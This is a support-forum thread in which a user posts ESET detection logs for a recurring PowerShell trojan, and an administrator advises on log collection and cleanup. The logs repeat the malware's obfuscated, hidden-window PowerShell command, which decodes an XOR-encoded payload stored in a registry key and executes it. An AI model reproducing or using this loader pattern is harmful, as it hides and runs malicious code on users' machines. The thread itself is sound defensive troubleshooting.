mic63 0 Posted July 24, 2023 Share Posted July 24, 2023 Hello everybody in here, i write about a problem i can't get out of. Nod32 continuously detects what follows, cleans the infection but after a reboot the problem starts again. The boot after, Nod32 again detects, cleans...reboot...again with this problem, and so on. Some of you maybe has a suggestion to work it out once for all ? Thanks for any kind help from you Mik P.S.: Hope i wrote correct to respect the forum rules ?Ora;Scanner;Tipo di oggetto;Oggetto;Rilevamento;Azione;Utente;Informazione;Hash;Prima visualizzazione 21/lug/2023 16:43:12;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8; 22/lug/2023 08:15:50;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8; 24/lug/2023 15:51:06;Scanner riga di comando;FILE;C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe;PowerShell/Agent.AQD trojan horse;pulito tramite eliminazione;KOMPUTER\mercurio;Si è verificato un evento durante un tentativo di esecuzione del seguente comando: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))";B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8; Link to comment Share on other sites More sharing options...
Administrators Marcos 5,090 Posted July 24, 2023 Administrators Share Posted July 24, 2023 Please collect logs with ESET Log Collector while selecting "Threat detection" in its menu. Later you will delete the binary payload from the registry in HKLM\SOfTWARE\AlieNwarEDB3A6N but for now don't delete anything until we get the logs and find the loader. Link to comment Share on other sites More sharing options...
mic63 0 Posted July 26, 2023 Author Share Posted July 26, 2023 Thanks Marcos, just done it. Attached the two zip files created as results of log collector.eav_logs.zip Hope i did everything correct elc3ADC.tmp-samples.zip Link to comment Share on other sites More sharing options...
Administrators Marcos 5,090 Posted July 26, 2023 Administrators Share Posted July 26, 2023 The machine has not been restarted almost for 2 days. Please restart it and see if the malware is cleaned from the registry during a startup scan. I don't see any reason why it wouldn't be since the Scheduled task is normally detected here. Also I'd strongly recommend enabling: Web access protection Anti-Phishing protection LiveGrid - feedback system With Web access protection off you open the door to Internet-borne threats and we cannot help you clean the infection until ESET is configured properly for protection. Nightowl 1 Link to comment Share on other sites More sharing options...
mic63 0 Posted July 26, 2023 Author Share Posted July 26, 2023 Hi Marcos my pc works all day long during these days, with a couple of restarts every day in any case i'll restart all the protections you just suggest to see what happens and if something changes I searched also for the key HKLM\SOfTWARE\AlieNwarEDB3A6N in the registry but couldn't find it (humbled) i'll write you in the next days Thx for your help Link to comment Share on other sites More sharing options...
Recommended Posts